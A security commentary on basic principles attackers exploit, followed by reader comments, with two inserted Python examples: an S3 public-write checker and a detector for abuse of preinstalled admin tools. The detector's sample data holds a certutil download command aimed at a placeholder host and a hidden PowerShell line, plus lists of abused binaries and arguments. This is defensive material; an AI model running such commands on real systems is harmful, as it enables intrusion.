Commentary
7/5/2018
David Pearson

4 Basic Principles to Help Keep Hackers Out

The most effective hackers keep things simple, something organizations must take into account.

Organizations continue to learn the hard way that when it comes to IT security, the simplest things often cause the biggest problems. A network is only as secure as its weakest link, so hackers don't need to spend the time and money it takes to develop advanced persistent threats or zero-day attacks; they just need to focus on finding the easiest ways of getting in. In other words, the most effective hackers keep things simple, something organizations must take into account.

With that in mind, here are four basic principles that attackers exploit and companies need to stay on top of in order to secure their network.

1. People Are Almost Always Your Most-Targeted Link
Hackers looking for a way to infiltrate a network often start with the vulnerabilities of key users — 81% of hacking-related breaches leveraged stolen and/or weak passwords, according to last year's Verizon Data Breach Investigations Report. Troubling statistics like this should remind us that people are often the hardest part of the security equation. People are fallible and emotional, which is why even regular security awareness training has its blind spots.

Think about it — how easy is it to make somebody's emotions take over in today's world? In the age of connectivity and social networks, it's easier than ever to find professional, personal, or political information that allows an attacker to craft personalized lures that trigger a response. Inducing such feelings can lead to irrational behavior, which in turn can be exploited digitally. Additionally, as the lines blur between personal and professional communication platforms, it is important to make sure that security awareness training, especially when it comes to phishing, carries over to the new mediums.

2. Flaws Remain Unfixed
Vendors and researchers don't always have the same goals or objectives, and security suffers as a result. There have been many cases where a researcher is forced to publish a legitimate vulnerability publicly because the vendor failed to recognize it as a true security issue when the matter was brought to its attention privately. This leaves gaping holes for attackers to exploit.

Similarly, when the company in charge of updates is not the owner of the piece of code exhibiting a vulnerability, flaws can remain for an extended period. For example, it can take a long time for a cellphone provider to push an update to users after Google fixes an Android security flaw in the OS. Flaws like this will always be present, providing an entry point for even the least-sophisticated attackers to access a network.

3. If There's a Mistake, Someone Will Find It
As automation continues to be a key outcome of digital transformation, the "good guys" aren't the only ones to benefit. Attackers are taking advantage of today's automated world and can easily scan for vulnerabilities. There are numerous public and paid services that allow users to explore the Internet pretty much anonymously, looking for misconfigurations that exist on anything from Internet of Things toasters to government cloud instances.

It's no longer a question of if somebody will discover your mistake, but when (and, more importantly, how long after it's been exposed). This story played out repeatedly in the breaches of 2017. Amazon Web Services' S3 breach is one example. Attackers found a misconfiguration in AWS storage buckets that allowed public write access, enabling them to launch silent man-in-the-middle attacks and other hacks against a company's customers or internal staff.

It's important to remember that misconfigurations extend beyond just missing patches and default settings to things like network paths that don't need to exist, giving sweeping landscapes to monitor.
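The public-write S3 misconfiguration described above is checkable before an attacker finds it. The following is an added example, not code from the article or from AWS: it evaluates a bucket policy and a legacy ACL (both constructed samples here) and flags any grant that lets an anonymous principal write. Bucket names and Sids are placeholders.

```python
import json
from fnmatch import fnmatch

# Actions that let an anonymous caller modify bucket contents or its policy.
WRITE_ACTIONS = {"s3:PutObject", "s3:DeleteObject", "s3:PutObjectAcl", "s3:PutBucketPolicy"}
ALL_USERS_URI = "http://acs.amazonaws.com/groups/global/AllUsers"

def _as_list(v):
    return v if isinstance(v, list) else [v]

def _principal_is_public(principal):
    """'*' or {"AWS": "*"} means anyone on the Internet, authenticated or not."""
    if principal == "*":
        return True
    if isinstance(principal, dict):
        return "*" in _as_list(principal.get("AWS", []))
    return False

def public_write_statements(policy):
    """Return the Sids of Allow statements that grant a write action to everyone.
    Wildcard actions such as s3:* or s3:Put* are expanded with fnmatch."""
    findings = []
    for st in policy.get("Statement", []):
        if st.get("Effect") != "Allow" or not _principal_is_public(st.get("Principal")):
            continue
        patterns = _as_list(st.get("Action", []))
        if any(fnmatch(a, p) for a in WRITE_ACTIONS for p in patterns):
            findings.append(st.get("Sid", "<no Sid>"))
    return findings

def acl_grants_public_write(acl):
    """True if a legacy ACL grant hands WRITE or FULL_CONTROL to AllUsers."""
    return any(g.get("Grantee", {}).get("URI") == ALL_USERS_URI
               and g.get("Permission") in {"WRITE", "FULL_CONTROL"}
               for g in acl.get("Grants", []))

# Constructed sample: a read-only public statement (acceptable for a static site)
# next to one that opens the bucket for uploads (the misconfiguration in question).
SAMPLE_POLICY = json.loads("""{
  "Version": "2012-10-17",
  "Statement": [
    {"Sid": "PublicRead", "Effect": "Allow", "Principal": "*",
     "Action": "s3:GetObject", "Resource": "arn:aws:s3:::example-bucket/*"},
    {"Sid": "OpenUpload", "Effect": "Allow", "Principal": {"AWS": "*"},
     "Action": ["s3:Put*"], "Resource": "arn:aws:s3:::example-bucket/*"}
  ]
}""")
SAMPLE_ACL = {"Grants": [{"Grantee": {"Type": "Group", "URI": ALL_USERS_URI},
                          "Permission": "WRITE"}]}
```

In a real account the policy and ACL would come from the bucket's GetBucketPolicy and GetBucketAcl responses; the same two checks apply.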

4. There Is a Security Workforce Shortage
In 2019, there will be a global shortage of 2 million cybersecurity professionals, according to ISACA, a nonprofit information security advocacy group. To compound the challenges caused by this lack of skilled analysts even more, the ones who are on the front lines are asked to do the impossible. They can't keep up with the barrage of alerts that come from so many sources. The flow is simply too great, and incidents are missed.

When an event is investigated, security teams are using so many internal and external tools, scripts, and conversations to get the relevant context that each investigation is a long and tedious process. This combination of factors is leaving security teams burned out and companies vulnerable.

Once again, hackers are acutely aware of these challenges that organizations face. They know that simple attack techniques will fly under the radar and may not be scored as a "priority" because analysts are too busy looking for larger, more complicated threats. It's why attackers will increasingly try to live off the land, using the sysadmin tools preinstalled with the operating system.
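The flip side of living off the land is that preinstalled admin tools leave ordinary process-creation events, so the signal for an overloaded analyst is context (who launched the tool, with what arguments), not the tool itself. This added example, not from the article, scores constructed process events with the parent/child/command-line triple that Sysmon and most EDR logs carry; the binary and parent lists are illustrative assumptions, not a complete rule set.

```python
import csv
import io

# Constructed process-creation events (not real telemetry).
SAMPLE_EVENTS = """parent,image,cmdline
outlook.exe,winword.exe,winword.exe /n quarterly_report.docx
winword.exe,powershell.exe,powershell.exe -WindowStyle Hidden -Command Get-Date
explorer.exe,powershell.exe,powershell.exe Get-Service
excel.exe,wmic.exe,wmic.exe process list brief
services.exe,wmic.exe,wmic.exe os get caption
cmd.exe,certutil.exe,certutil.exe -urlcache -split -f http://placeholder.invalid/x x
"""

# Administrative binaries that ship with Windows and are routinely repurposed.
LOLBINS = {"powershell.exe", "wmic.exe", "certutil.exe", "mshta.exe",
           "rundll32.exe", "regsvr32.exe"}
# Document and mail clients have no legitimate reason to spawn admin tooling.
USER_APP_PARENTS = {"winword.exe", "excel.exe", "outlook.exe", "powerpnt.exe", "acrord32.exe"}
# Argument fragments that hide the window or pull remote content.
SUSPICIOUS_ARGS = ("-windowstyle hidden", "-w hidden", "-encodedcommand",
                   "-urlcache", "http://", "https://")

def score_event(ev):
    """Return (score, reasons) for one event; higher means more worth analyst time."""
    score, reasons = 0, []
    image, parent, cmd = ev["image"].lower(), ev["parent"].lower(), ev["cmdline"].lower()
    if image not in LOLBINS:
        return 0, reasons            # ordinary process, nothing to say
    if parent in USER_APP_PARENTS:
        score += 3
        reasons.append(f"{parent} spawned {image}")
    hits = [a for a in SUSPICIOUS_ARGS if a in cmd]
    if hits:
        score += len(hits)
        reasons.append("suspicious args: " + ", ".join(hits))
    return score, reasons

def triage(csv_text, threshold=2):
    """Return [(image, score, reasons)] for events at or above the threshold,
    so the admin tool run from a normal shell with normal arguments is left alone."""
    flagged = []
    for ev in csv.DictReader(io.StringIO(csv_text)):
        score, reasons = score_event(ev)
        if score >= threshold:
            flagged.append((ev["image"], score, reasons))
    return flagged
```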

What Does It All Mean?
In the end, understanding the basic principles that hackers are using to infiltrate your network is an important part of staying one step ahead of them. But remember that even the basics will change over time. The most effective thing you can do to overcome these simple, yet evolving threats is to focus on the people protecting your organization.

These people need to understand their role in securing the environment and the overall impact of the decisions they make. Make sure analysts know what they are protecting and ensure the right controls are in place to stay focused. Finally, be certain that the security teams have the visibility and the tools they need to detect, investigate, and respond quickly and efficiently.

David Pearson has been analyzing network traffic for well over a decade, having used Wireshark ever since it was Ethereal. He has spent the majority of his professional career understanding how networks and applications work, currently as Principal Threat Researcher for Awake ...
Comments
Joe Stanganelli,
User Rank: Ninja
7/9/2018 | 7:52:42 PM
Re: CIO-CISO conflict
@Christian: Alas, the trend of high-level execs simply outsourcing anything cybersecurity-related wholesale -- strategy and all -- without much forethought -- continues, as I recently observed for a Dark Reading sister site here: securitynow.com/author.asp?section_id=613&doc_id=738870

While I generally agree with you, I will say that one thing that concerns me about stereotypes and stereotypical perceptions is the generalized notion (certainly not all of them) of hackers and IT admins and devs pooh-poohing the lawyers and compliance peeps, which could be problematic for a CISO if that view pervaded to that level.

Of course, technically, security, compliance, and privacy are all three separate circles on the Venn diagram of data stewardship... perhaps we need a Chief Data Steward to oversee -- or, at least, help integrate -- all three.
No SOPA,
User Rank: Ninja
7/6/2018 | 3:26:53 PM
Re: CIO-CISO conflict
To Joe's point, as a past code-monkey I definitely was guilty of seeing CISO leaders as just another C-Level lackey. I've been reading a lot more articles the last couple of years that identify the role of CISO as suffering not only in that area, but also from the general perception that the real InfoSec knowledge sits with lower-level managers and hackers. When I was younger, we saw the C-Levels pimping expensive software packages, trying to fill gaps in process with bloatware and 3rd party vendors. From my perspective, the real talent reading whitepapers, following cutting-edge tech from visionaries and testing out new code ideas in virtual environments were the grunts in the code trenches, not the C-Levels, not the CISOs, but the front-line cyber defenders who never slept, never wore a suit, and so on. I could point to plenty of CISOs now who came up from those trenches and have earned respect and the right to be heard, but in the overall business model, I'm afraid the CISO is still not seen any differently than the rest of the often disposable and (frankly) figure-head C-Level roles. I think if that role were carefully trimmed and only truly qualified and knowledgeable hackers were placed there, the idea of the CISO as a "lackey" or "underling" might fade and the industry might also start moving away from the C-Level chains that so many Enterprise organizations still suffer from.
Joe Stanganelli,
User Rank: Ninja
7/5/2018 | 2:28:26 PM
CIO-CISO conflict
Unfixed flaws and unpatched vulnerabilities will remain an issue as long as the CISO is treated as some sort of underling -- whether a direct report or not -- to the CIO. The CIO is judged against business agility objectives, which can run completely counter to the interests of the CISO's office.